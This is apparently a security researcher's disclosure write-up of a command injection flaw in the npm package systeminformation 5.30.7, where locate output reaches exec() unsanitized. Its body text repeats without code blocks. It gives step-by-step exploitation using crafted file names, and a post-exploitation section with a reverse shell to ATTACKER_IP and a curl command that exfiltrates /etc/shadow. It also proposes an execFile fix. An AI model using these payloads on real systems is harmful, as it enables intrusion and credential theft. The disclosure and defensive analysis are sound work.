Command Injection via Unsanitized locate Output in versions() — systeminformation
Package: systeminformation (npm)
Tested Version: 5.30.7
Affected Platform: Linux
Author: Sebastian Hildebrandt
Weekly Downloads: ~5,000,000+
Repository: https://github.com/sebhildebrandt/systeminformation
Severity: Medium
CWE: CWE-78 (OS Command Injection)
Reconnaissance
Started by identifying high-value npm packages that heavily use child_process.exec() for system-level operations. systeminformation immediately stood out — it's a system monitoring library with over 5 million weekly downloads on npm, used in monitoring dashboards, server health checks, and DevOps tooling.
What made it a strong target:
- It has a formal SECURITY.md and accepts private security advisories
- It has 9 prior command injection CVEs (GHSA-wphj-fx3q-84ch, GHSA-cvv5-9h9w-qp2m, GHSA-gx6r-qc2v-3p3v, and others from 2020–2025), all following the same pattern: user-controlled or external data concatenated into
exec() calls
- The package has its own sanitization function (
sanitizeShellString) but doesn't apply it consistently across all code paths
I pulled the package locally and started a manual code audit:
mkdir /tmp/si-audit && cd /tmp/si-audit
npm install systeminformation@5.30.7
Source Code Analysis
Mapping the Attack Surface
First step was mapping every exec() and execSync() call across all library files:
grep -rn "exec(" node_modules/systeminformation/lib/*.js | wc -l
Found 100+ exec calls spread across 23 files. The key files with the most calls:
osinfo.js — 56 exec calls (version detection for dozens of tools)
network.js — 14 exec calls (interface stats, connections)
filesystem.js — 18 exec calls (disk info, block devices)
wifi.js — 3 exec calls (wireless scanning)
processes.js — several exec calls (service status, process stats)
Identifying the Sanitization Gap
The library has a function called sanitizeShellString() in lib/util.js that strips dangerous shell characters like ;, &, |, `, $, ', ", etc. Most functions that accept user input run it through this sanitizer before building commands.
I went through every exec() call looking for cases where external data reaches exec() without passing through sanitizeShellString(). Most paths were clean — the maintainer has clearly been patching these over time after the previous CVEs.
But then I hit lib/osinfo.js, line 770.
The Vulnerable Code Path
Inside the versions() function, when detecting the PostgreSQL version on Linux, the code does this:
// lib/osinfo.js — lines 770-776
exec('locate bin/postgres', (error, stdout) => {
if (!error) {
const postgresqlBin = stdout.toString().split('\n').sort();
if (postgresqlBin.length) {
exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', (error, stdout) => {
// parses version string...
});
}
}
});
Here's what happens step by step:
- It runs
locate bin/postgres to search the filesystem for PostgreSQL binaries
- It splits the output by newline and sorts the results alphabetically
- It takes the last element (highest alphabetically)
- It concatenates that path directly into a new
exec() call with + ' -V'
No sanitizeShellString(). No path validation. No execFile(). Raw string concatenation into exec().
The locate command reads from a system-wide database (plocate.db or mlocate.db) that indexes all filenames on the system. If any indexed filename contains shell metacharacters — specifically semicolons — those characters will be interpreted by the shell when passed to exec().
Exploitation
Prerequisites
For this vulnerability to be exploitable, the following conditions must be met:
- Target system runs Linux — the vulnerable code path is inside an
if (_linux) block
locate / plocate is installed — common on Ubuntu, Debian, Fedora, RHEL
- PostgreSQL binary exists in the locate database — so
locate bin/postgres returns results (otherwise the code falls through to a safe psql -V fallback)
- The attacker can create files on the filesystem — in any directory that gets indexed by
updatedb
- The locate database gets updated —
updatedb runs daily via systemd timer (plocate-updatedb.timer) or cron on most distros
Step 1 — Verify the Environment
On the target machine, confirm locate is available and running:
which locate
# /usr/bin/locate
systemctl list-timers | grep plocate
# plocate-updatedb.timer plocate-updatedb.service
# (runs daily, typically around 1-2 AM)
Check who owns the locate database:
ls -la /var/lib/plocate/plocate.db
# -rw-r----- 1 root plocate 18851616 Feb 14 01:50 /var/lib/plocate/plocate.db
Database is root-owned and updated by root. Regular users cannot update it directly, but updatedb runs on a daily schedule and indexes all readable files.
Step 2 — Craft the Malicious File Path
The key insight is that Linux allows semicolons in filenames, and exec() passes strings through /bin/sh -c which interprets semicolons as command separators.
Create a file whose path contains an injected command:
mkdir -p "/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin"
touch "/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres"
Verify it exists:
find /var/tmp -name postgres
# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
This file needs to end up in the locate database. On a real system, this happens automatically when updatedb runs overnight. For testing purposes:
Then verify locate picks it up:
locate bin/postgres
# /usr/lib/postgresql/14/bin/postgres
# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
Step 3 — Understand the Sort Trick
The vulnerable code sorts the locate results alphabetically and takes the last element:
const postgresqlBin = stdout.toString().split('\n').sort();
exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', ...);
Alphabetically, /var/ sorts after /usr/. So our malicious path naturally becomes the selected one:
Node.js sort order:
[0] /usr/lib/postgresql/14/bin/postgres ← legitimate
[1] /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres ← selected (last)
Quick verification:
node -e "
const paths = [
'/usr/lib/postgresql/14/bin/postgres',
'/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'
];
console.log('Sorted:', paths.sort());
console.log('Selected (last):', paths[paths.length - 1]);
"
Output:
Sorted: [
'/usr/lib/postgresql/14/bin/postgres',
'/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'
]
Selected (last): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres
Step 4 — Trigger the Vulnerability
Now when any application using systeminformation calls versions() requesting the postgresql version, the injected command fires:
const si = require('systeminformation');
// This is a normal, innocent API call
si.versions('postgresql').then(data => {
console.log(data);
});
Internally, the library builds and executes this command:
/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V
The shell (/bin/sh -c) interprets this as three separate commands:
/var/tmp/x → fails silently (not executable)
touch /tmp/SI_RCE_PROOF → ATTACKER'S COMMAND EXECUTES
/bin/postgres -V → runs normally, returns version
Step 5 — Verify Code Execution
ls -la /tmp/SI_RCE_PROOF
# -rw-rw-r-- 1 appuser appuser 0 Feb 14 15:30 /tmp/SI_RCE_PROOF
The file exists. Arbitrary command execution confirmed.
The injected command runs with whatever privileges the Node.js process has. In a monitoring dashboard or backend API context, that's typically the application service account.
Post-Exploitation
Once you have arbitrary command execution through this vector, the next steps depend on the environment:
Reverse shell:
mkdir -p "/var/tmp/x;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1;/bin"
touch "/var/tmp/x;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1;/bin/postgres"
Data exfiltration:
mkdir -p "/var/tmp/x;curl http://ATTACKER_IP/exfil?d=$(cat /etc/shadow|base64);/bin"
touch "/var/tmp/x;curl http://ATTACKER_IP/exfil?d=$(cat /etc/shadow|base64);/bin/postgres"
Lateral movement: If the Node.js process has access to cloud credentials, database connections, or internal APIs, those can be harvested from environment variables, config files, or process memory.
Real-World Attack Scenarios
Scenario 1 — Shared Hosting / Multi-Tenant Server
A low-privileged user on a shared server creates the malicious file in /tmp or their home directory. The hosting provider runs a monitoring agent that uses systeminformation for health dashboards. Next time the agent calls versions(), the attacker's command executes under the monitoring agent's (higher-privileged) service account.
Scenario 2 — CI/CD Pipeline Poisoning
A malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses systeminformation for environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context — potentially leaking secrets, tokens, and deployment keys.
Scenario 3 — Container / Kubernetes Escape
In containerized environments where /var or /tmp sits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (running systeminformation) calls versions(), the injected command executes on the host, breaking out of the container boundary.
Why This Bypasses Existing Defenses
The library has sanitizeShellString() which strips ;, &, |, `, $, and other dangerous characters. This function is used in most user-facing APIs like networkStats(), services(), processLoad(), etc.
But the locate output in versions() never passes through this sanitizer. The data flows directly from one exec() callback into another exec() call. It appears the developer treated locate output as trusted system data, but the locate database indexes all filenames on the filesystem, including those created by unprivileged users.
For reference, here are the prior CVEs in this same package with the exact same root cause — unsanitized external data reaching exec():
The pattern is consistent: external string → string concatenation → exec() → shell interprets metacharacters.
Suggested Fix
Replace exec() with execFile() for the PostgreSQL binary version check. execFile() does not spawn a shell, so metacharacters in the path are treated as literal characters:
const { execFile } = require('child_process');
exec('locate bin/postgres', (error, stdout) => {
if (!error) {
const postgresqlBin = stdout.toString().split('\n')
.filter(p => p.trim().length > 0)
.sort();
if (postgresqlBin.length) {
execFile(postgresqlBin[postgresqlBin.length - 1], ['-V'], (error, stdout) => {
// ... parse version
});
}
}
});
Additionally, the locate output should be validated against a safe path pattern before use:
const safePath = /^[a-zA-Z0-9/_.-]+$/;
const postgresqlBin = stdout.toString().split('\n')
.filter(p => safePath.test(p.trim()))
.sort();
Disclosure
Command Injection via Unsanitized
locateOutput inversions()— systeminformationPackage: systeminformation (npm)
Tested Version: 5.30.7
Affected Platform: Linux
Author: Sebastian Hildebrandt
Weekly Downloads: ~5,000,000+
Repository: https://github.com/sebhildebrandt/systeminformation
Severity: Medium
CWE: CWE-78 (OS Command Injection)
Reconnaissance
Started by identifying high-value npm packages that heavily use
child_process.exec()for system-level operations.systeminformationimmediately stood out — it's a system monitoring library with over 5 million weekly downloads on npm, used in monitoring dashboards, server health checks, and DevOps tooling.What made it a strong target:
exec()callssanitizeShellString) but doesn't apply it consistently across all code pathsI pulled the package locally and started a manual code audit:
Source Code Analysis
Mapping the Attack Surface
First step was mapping every
exec()andexecSync()call across all library files:Found 100+ exec calls spread across 23 files. The key files with the most calls:
osinfo.js— 56 exec calls (version detection for dozens of tools)network.js— 14 exec calls (interface stats, connections)filesystem.js— 18 exec calls (disk info, block devices)wifi.js— 3 exec calls (wireless scanning)processes.js— several exec calls (service status, process stats)Identifying the Sanitization Gap
The library has a function called
sanitizeShellString()inlib/util.jsthat strips dangerous shell characters like;,&,|,`,$,',", etc. Most functions that accept user input run it through this sanitizer before building commands.I went through every
exec()call looking for cases where external data reachesexec()without passing throughsanitizeShellString(). Most paths were clean — the maintainer has clearly been patching these over time after the previous CVEs.But then I hit
lib/osinfo.js, line 770.The Vulnerable Code Path
Inside the
versions()function, when detecting the PostgreSQL version on Linux, the code does this:Here's what happens step by step:
locate bin/postgresto search the filesystem for PostgreSQL binariesexec()call with+ ' -V'No
sanitizeShellString(). No path validation. NoexecFile(). Raw string concatenation intoexec().The
locatecommand reads from a system-wide database (plocate.dbormlocate.db) that indexes all filenames on the system. If any indexed filename contains shell metacharacters — specifically semicolons — those characters will be interpreted by the shell when passed toexec().Exploitation
Prerequisites
For this vulnerability to be exploitable, the following conditions must be met:
if (_linux)blocklocate/plocateis installed — common on Ubuntu, Debian, Fedora, RHELlocate bin/postgresreturns results (otherwise the code falls through to a safepsql -Vfallback)updatedbupdatedbruns daily via systemd timer (plocate-updatedb.timer) or cron on most distrosStep 1 — Verify the Environment
On the target machine, confirm locate is available and running:
Check who owns the locate database:
Database is root-owned and updated by root. Regular users cannot update it directly, but
updatedbruns on a daily schedule and indexes all readable files.Step 2 — Craft the Malicious File Path
The key insight is that Linux allows semicolons in filenames, and
exec()passes strings through/bin/sh -cwhich interprets semicolons as command separators.Create a file whose path contains an injected command:
Verify it exists:
This file needs to end up in the
locatedatabase. On a real system, this happens automatically whenupdatedbruns overnight. For testing purposes:Then verify locate picks it up:
Step 3 — Understand the Sort Trick
The vulnerable code sorts the locate results alphabetically and takes the last element:
Alphabetically,
/var/sorts after/usr/. So our malicious path naturally becomes the selected one:Quick verification:
Output:
Step 4 — Trigger the Vulnerability
Now when any application using systeminformation calls
versions()requesting the postgresql version, the injected command fires:Internally, the library builds and executes this command:
The shell (
/bin/sh -c) interprets this as three separate commands:Step 5 — Verify Code Execution
The file exists. Arbitrary command execution confirmed.
The injected command runs with whatever privileges the Node.js process has. In a monitoring dashboard or backend API context, that's typically the application service account.
Post-Exploitation
Once you have arbitrary command execution through this vector, the next steps depend on the environment:
Reverse shell:
Data exfiltration:
Lateral movement: If the Node.js process has access to cloud credentials, database connections, or internal APIs, those can be harvested from environment variables, config files, or process memory.
Real-World Attack Scenarios
Scenario 1 — Shared Hosting / Multi-Tenant Server
A low-privileged user on a shared server creates the malicious file in
/tmpor their home directory. The hosting provider runs a monitoring agent that usessysteminformationfor health dashboards. Next time the agent callsversions(), the attacker's command executes under the monitoring agent's (higher-privileged) service account.Scenario 2 — CI/CD Pipeline Poisoning
A malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses
systeminformationfor environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context — potentially leaking secrets, tokens, and deployment keys.Scenario 3 — Container / Kubernetes Escape
In containerized environments where
/varor/tmpsits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (runningsysteminformation) callsversions(), the injected command executes on the host, breaking out of the container boundary.Why This Bypasses Existing Defenses
The library has
sanitizeShellString()which strips;,&,|,`,$, and other dangerous characters. This function is used in most user-facing APIs likenetworkStats(),services(),processLoad(), etc.But the
locateoutput inversions()never passes through this sanitizer. The data flows directly from oneexec()callback into anotherexec()call. It appears the developer treatedlocateoutput as trusted system data, but the locate database indexes all filenames on the filesystem, including those created by unprivileged users.For reference, here are the prior CVEs in this same package with the exact same root cause — unsanitized external data reaching
exec():fsSize()inetChecksite()The pattern is consistent: external string → string concatenation →
exec()→ shell interprets metacharacters.Suggested Fix
Replace
exec()withexecFile()for the PostgreSQL binary version check.execFile()does not spawn a shell, so metacharacters in the path are treated as literal characters:Additionally, the locate output should be validated against a safe path pattern before use:
Disclosure